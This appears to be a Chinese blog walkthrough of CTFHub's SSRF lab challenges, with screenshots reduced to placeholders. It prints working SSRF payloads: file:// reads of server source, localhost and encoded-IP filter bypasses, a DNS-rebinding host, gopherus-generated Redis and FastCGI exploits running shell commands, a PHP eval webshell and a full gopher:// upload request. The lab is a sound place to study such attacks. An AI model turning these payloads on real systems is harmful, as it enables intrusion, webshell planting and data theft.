CTFHub靶场渗透~SSRF注入

已于 2024-07-31 22:54:43 修改
阅读量416 收藏 4
点赞数 19
分类专栏: CTFHub靶场 文章标签: git github 网络安全 csrf
于 2024-07-30 09:03:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67832625/article/details/140781620
版权

在这里插入图片描述

内网访问

image-20240729155422295

image-20240729155522964

image-20240729155551602

伪协议读取文件

# 提示我们要读取web目录下的flag.php,所以我们直接用file来读取

image-20240729155729589

image-20240729161152763

发现页面有提示,我们直接看源码拿下flag

image-20240729161423367

image-20240729161512375

端口扫描

# 此题我们看到端口扫描,然后我们burp抓包

image-20240729162205733

image-20240729162223034image-20240729163042355

URL Bypass

# 本题需要我们绕过来访问网页,所以我们使用@来试一下
url=http://notfound.ctfhub.com@127.0.0.1/flag.php

image-20240729164100596

数字IP Bypass

# 这次把数字也ban了,我们就要想其他办法,可以尝试转化为其他的方式,然后再进行访问
127.0.0.1–>localhost
127.0.0.1–>7F000001 十六进制
127.0.0.1–>2130706433 十进制
127.0.0.1–>2130706433 Enclosed Alphanumerics

image-20240729164656567

302跳转 Bypass

# 尝试访问127.0.0.1/flag.php,发现页面提示我们banip了,所以我们看一下源码,到底ban了什么
?url=127.0.0.1/flag.php

image-20240729171417087

# 读取源码文件,看一下文件内容
?url=file:///var/www/html/flag.php

image-20240729171833087

# 查看文件并没有得到什么,所以我们查看index.php,文件里有什么
?url=file:///var/www/html/index.php

image-20240729172031078

# 通过查看index.php得到源码中ban了127,172,10,192数字,因此我们使用数字绕过的方式来解决
?url=http://localhost/flag.php

image-20240729172526435

DNS重绑定 Bypass

# 利用思路
对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判
断,如果在黑名单中,就pass掉。但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务
端去请求URL之间存在一个时间差,利用这个时间差,我们可以进行DNS 重绑定攻击。我们利用DNS
Rebinding技术,在第一次校验IP的时候返回一个合法的IP,在真实发起请求的时候,返回我们真正想
要访问的内网IP即可。
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS
Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0,这是为了防止有DNS服务器
对解析结果进行缓存。这样就可以进行攻击了,完整的攻击流程为:
1.服务器端获得URL参数,进行第一次DNS解析,获得了一个非内网的IP
2.对于获得的IP进行判断,发现为非黑名单IP,则通过验证
3.服务器端对于URL进行访问,由于DNS服务器设置的TTL为0,所以再次进行DNS解析,这一次DNS服务
器返回的是内网地址。
4.由于已经绕过验证,所以服务器端返回访问内网资源的结果。

# 首先我们需要访问附件地址来看解析网站上获取解析到内网IP的域名并作访问即可获取其Flag...
?url=https://lock.cmpxchg8b.com/rebinder.html

image-20240729184149327

# 然后我们将解析到的域名输入url完成flag的查找
?url=http://7f000001.c0a80001.rbndr.us/flag.php

image-20240729184546089

Redis协议

# 和FastCGI一样,我们先进行同样的步骤
python2 gopherus.py --exploit redis
PHPshell
<?php @eval($_POST['attack']);?>

image-20240729200115434

image-20240729200148322

# 然后我们访问shell.php,得到结果

image-20240729201500739

# 我们用蚁剑进行连接,在根目录下发现ctfhub

image-20240729201528537

FastCGI协议

# 准备工作
在线编码网址:https://icyberchef.com/

gopherus工具:https://mp.csdn.net/mp_blog/creation/editor/139440201

# 利用gopherus工具,然后进入工作台
python2 gopherus.py --exploit fastcgi
/var/www/html/index.php
ls/

image-20240729194806476

# 把中间的代码进行url编码,然后输入到url中查看

image-20240729194916447

image-20240729194933103

# 把flag再次输入进行同样的步骤
python2 gopherus.py --exploit fastcgi
/var/www/html/index.php
cat /flag_8481e1506f0e4b5bee3cd64c2d32dc85

image-20240729195038864

# 将内容再次进行编码输入到url中的到结果

image-20240729195203849

image-20240729195214587

文件上传

# 首先我们进行访问
127.0.0.1/flag.php

image-20240729204148058

# 我们看到这个页面给他搞个提交按钮,然后提交并抓包

image-20240729204654577

image-20240729205454070

# 然后我们开始构造数据包
?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520292%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250A%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522test.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250ASSRF%2520Upload%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY--

此代码是通用的回环地址,我们就可以将其放到url后面,最后得到结果

image-20240729211001555
好小子,离成功又近一步!!!

蚂蚱.top
关注
专栏目录
SSRF漏洞靶场
WINDY_PACE的博客
05-15 2802
对于SSRF,回显是能够成功利⽤的重要条件,所以过滤返回信息,验证远程服务器对请求的响应是⽐较容易的⽅法。如果WEB应⽤ 是去获取某⼀种类型的⽂件,那么在把返回结果展⽰给⽤户之前先验证返回的信息是否符合标准。 禁⽤不需要的协议,仅仅允许HTTP和HTTPS请求。可以防⽌类似于file://、gopher://、ftp://等引起的问题
以题为例浅谈SSRF(1),实战案例
2301_79099473的博客
04-11 611
??phpif (!url=_");exit;```flag.php源码```phpreturn;echo $flag;exit;???payload =“”"“”"#注意后面一定要有回车,回车结尾表示http请求结束print(result) # 这里因为是GET请求所以要进行两次url编码。
CTF靶场搭建
skysys的研究小屋
01-25 1596
三步完成CTFd搭建 CTFd-Whale 推荐部署实践
渗透测试干货--SSRF漏洞靶场实战获取对方root权限详解
Hexuefu_Bayonet的博客
04-24 2049
20200424 1.SSRF测试方法 1.1 漏洞环境:PHP脚本、Windows 1.2 利用工具:nc、bash 1.3 测试过程 首先采用如下脚本创建一个PHP的服务端: <?PHP $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); #curl_setopt($ch, CURLOPT_FOLLOWLOCAT...
超详细,手把手教你打造CTF动态靶场,零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
06-09 1135
想搞一个CTF比赛,需要一个竞赛靶场,于是这个任务就落在了我的身上,平台是利用CTFd框架,基于docker搭建的动态靶场搭建过程中遇到的坑比较多,这里我会把每一个遇到的坑都指出来。我搭建的是CTFd的3.X的版本。
常用的网络安全靶场、工具箱、学习路线推荐
网络安全
04-18 3414
本公众号名称从“网络安全研究所”正式改为“网络安全实验室”有招聘需求的可以后台联系运营人员。对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常...
漏洞原理——ssrf
热门推荐
nobugnomoney的博客
04-04 2万+
一、什么是SSRF 1、简单了解 SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。 攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;攻击者在访问A时,利用A的特定功能构造特殊payload,由A发起对内部
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
2401_85773496的博客
08-26 997
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!_ctf awd工具箱
shanguicsdn111的博客
09-26 690
CTF在线工具1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
CTFHub靶场————SSRF
qq_61579604的博客
10-17 123
用户访问一个特定的域名,然后这个域名原来是一个正常的ip。但是当域名持有者修改域名对应的ip后,用户再访问这个域名的时候,浏览器以为你一直访问的是一个域名,就会认为很安全。SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php。要求是请求的URL中必须包含http://notfound.ctfhub.com这里我第一时间想到的是绕过。DNS重绑定并没有违反同源策略,相当于是钻了同源策略,同域名同端口访问的空子了。
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 423
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 616
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
CTFHUB-SSRF-FastCGI协议
qq_62078839的博客
04-23 1950
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 第一种方式 exp import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2 = True if sys.version_info.major == 2 el
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2068
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
git操作pull的时候出现冲突怎么解决
最新发布
fury的博客
10-08 408
问:回答:
使用 Docker 构建 LLaMA-Factory 环境
GDHBFTGGG的博客
10-01 1244
使用 Docker 构建 LLaMA-Factory 环境可以简化依赖安装和环境配置。
gligen安装部署笔记
jacke121的专栏
10-08 91
gligen安装部署笔记
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值